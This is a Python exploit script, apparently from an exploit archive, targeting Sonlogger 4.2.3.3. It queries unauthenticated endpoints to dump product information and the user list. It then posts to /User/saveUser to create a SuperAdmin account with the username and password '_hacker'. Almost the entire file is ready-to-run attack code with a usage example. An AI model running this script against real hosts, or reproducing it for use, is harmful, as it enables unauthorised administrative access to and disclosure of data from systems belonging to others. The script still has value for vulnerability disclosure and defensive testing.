105 lines
No EOL
3.1 KiB
Python
Executable file
105 lines
No EOL
3.1 KiB
Python
Executable file
# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
|
|
# Date: 04-02-2021
|
|
# Exploit Author: Berkan Er
|
|
# Vendor Homepage: https://www.sonlogger.com/
|
|
# Version: 4.2.3.3
|
|
# Tested on: Windows 10 Enterprise x64 Version 1803
|
|
# A remote attacker can be create an user with SuperAdmin profile
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import argparse
|
|
import string
|
|
import sys
|
|
from random import random
|
|
|
|
import requests
|
|
import json
|
|
|
|
banner = '''
|
|
Sonlogger Log and Report System - v4.2.3.3
|
|
Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
|
|
|
|
Berkan Er <b3rsec@protonmail.com>
|
|
@erberkan
|
|
'''
|
|
|
|
commonHeaders = {
|
|
'Content-type': 'application/json',
|
|
'Accept': 'application/json, text/javascript, */*; q=0.01',
|
|
'X-Requested-With': 'XMLHttpRequest'
|
|
}
|
|
|
|
|
|
def get_random_string():
|
|
res = ''.join(random.choices(string.ascii_lowercase, k=8))
|
|
print(res)
|
|
return str(res)
|
|
|
|
|
|
def getProductInfo(host, port, flag):
|
|
response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
|
|
data={},
|
|
headers=commonHeaders)
|
|
|
|
print("[*] Status code: ", response.status_code)
|
|
print("[*] Product Version: ", response.json()['Version'])
|
|
info_json = json.dumps(response.json(), indent=2)
|
|
|
|
response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
|
|
user_json = json.dumps(response_1.json(), indent=2)
|
|
|
|
if flag:
|
|
print("\n*** Product Infos=\n" + info_json)
|
|
print("\n*** Users=\n" + user_json)
|
|
|
|
if response.json()['Version'] == '4.2.3.3':
|
|
print("[+] It seems vulnerable !")
|
|
return True
|
|
else:
|
|
print("[!] It doesn't vulnerable !")
|
|
return False
|
|
|
|
|
|
def createSuperAdmin(host, port):
|
|
payload = '''{
|
|
'_profilename':'superadmin_profile',
|
|
'_username':'_hacker',
|
|
'_password':'_hacker',
|
|
'_fullname':'', '_email':''
|
|
}'''
|
|
|
|
response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
|
|
print("[*] STAUTS CODE:", response.status_code)
|
|
print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")
|
|
|
|
response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
|
|
json_formatted_str = json.dumps(response_1.json(), indent=2)
|
|
print("\n*** Users=\n" + json_formatted_str)
|
|
|
|
|
|
def main():
|
|
print(banner)
|
|
|
|
try:
|
|
host = sys.argv[1]
|
|
port = sys.argv[2]
|
|
action = sys.argv[3]
|
|
|
|
if action == 'TRUE':
|
|
if getProductInfo(host, port, False):
|
|
createSuperAdmin(host, port)
|
|
else:
|
|
getProductInfo(host, port, True)
|
|
|
|
print("KTHNXBYE!")
|
|
|
|
except:
|
|
print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
|
|
"Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
|
|
"Infos")
|
|
print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main() |